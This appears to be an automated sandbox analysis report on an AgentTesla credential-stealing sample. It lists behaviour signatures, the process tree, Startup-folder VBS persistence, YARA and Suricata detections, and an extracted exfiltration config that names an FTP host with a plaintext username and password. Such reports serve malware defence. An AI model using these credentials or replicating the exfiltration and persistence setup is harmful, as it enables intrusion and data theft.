Windows Analysis Report
toIuQILmr1.exe

Overview

General Information

Sample name: toIuQILmr1.exe (renamed because original name is a hash value)
Original sample name: 0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9.exe
Analysis ID: 1588811
MD5: 9b46500828b338eb4cda1d49bed1f791
SHA1: fe2f2d5e222765e585a61f80c33b061f643e7107
SHA256: 0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9
Tags: AgentTesla, exe, user-adrian__luca

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • toIuQILmr1.exe (PID: 360 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
    • outvaunts.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
      • RegSvcs.exe (PID: 5376 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 3648 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • outvaunts.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
      • RegSvcs.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: dump.pcap | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

Source: 2.2.outvaunts.exe.1b30000.1.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 2.2.outvaunts.exe.1b30000.1.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 2.2.outvaunts.exe.1b30000.1.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
  • 0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 2.2.outvaunts.exe.1b30000.1.unpack | Rule: MALWARE_Win_AgentTeslaV2 | Description: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
  • 0x2fb6b:$s2: GetPrivateProfileString
  • 0x2f218:$s3: get_OSFullName
  • 0x30906:$s5: remove_Key
  • 0x30ab3:$s5: remove_Key
  • 0x31995:$s6: FtpWebRequest
  • 0x32917:$s7: logins
  • 0x32e89:$s7: logins
  • 0x35b8e:$s7: logins
  • 0x35c4c:$s7: logins
  • 0x375a1:$s7: logins
  • 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
Source: 5.2.outvaunts.exe.3e90000.1.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 3648, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 3648, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\kinematical\outvaunts.exe, ProcessId: 5752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:51:02.044557+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 162.241.62.63 | 21 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:51:02.441601+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 162.241.62.63 | 33214 | TCP
2025-01-11T05:51:02.446904+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 162.241.62.63 | 33214 | TCP

                    AV Detection

Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Virustotal: Detection: 76%
Source: toIuQILmr1.exe | Virustotal: Detection: 76%
Source: toIuQILmr1.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Joe Sandbox ML: detected
Source: toIuQILmr1.exe | Joe Sandbox ML: detected
Source: toIuQILmr1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E34696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E34696
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E3C9C7
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3C93C FindFirstFileW,FindClose,0_2_00E3C93C
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F200
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F35D
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3F65E
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33A2B
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33D4E
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3BF27
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00CB4696
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00CBC9C7
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBC93C FindFirstFileW,FindClose,2_2_00CBC93C
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF200
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF35D
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBF65E
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3A2B
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3D4E
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBBF27
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_00CB4696
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00CBC9C7
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBC93C FindFirstFileW,FindClose,5_2_00CBC93C
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF200
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF35D
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBF65E
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3A2B
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3D4E
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBBF27

                    Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49713 -> 162.241.62.63:33214
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49707 -> 162.241.62.63:21
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 162.241.62.63:33214
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 162.241.62.63
Source: unknown | DNS query: name: ip-api.com
Source: unknown | FTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49707
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 4 of 150 allowed.
  220-Local time is now 22:51. Server port: 21.
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E425E2
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000006.00000002.4510792192.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting&
Source: RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E4425A
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E44458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E44458
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CC4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00CC4458
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CC4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00CC4458
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E4425A
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E30219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E30219
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E5CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E5CDAC
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00CDCDAC
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00CDCDAC

                    System Summary

Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
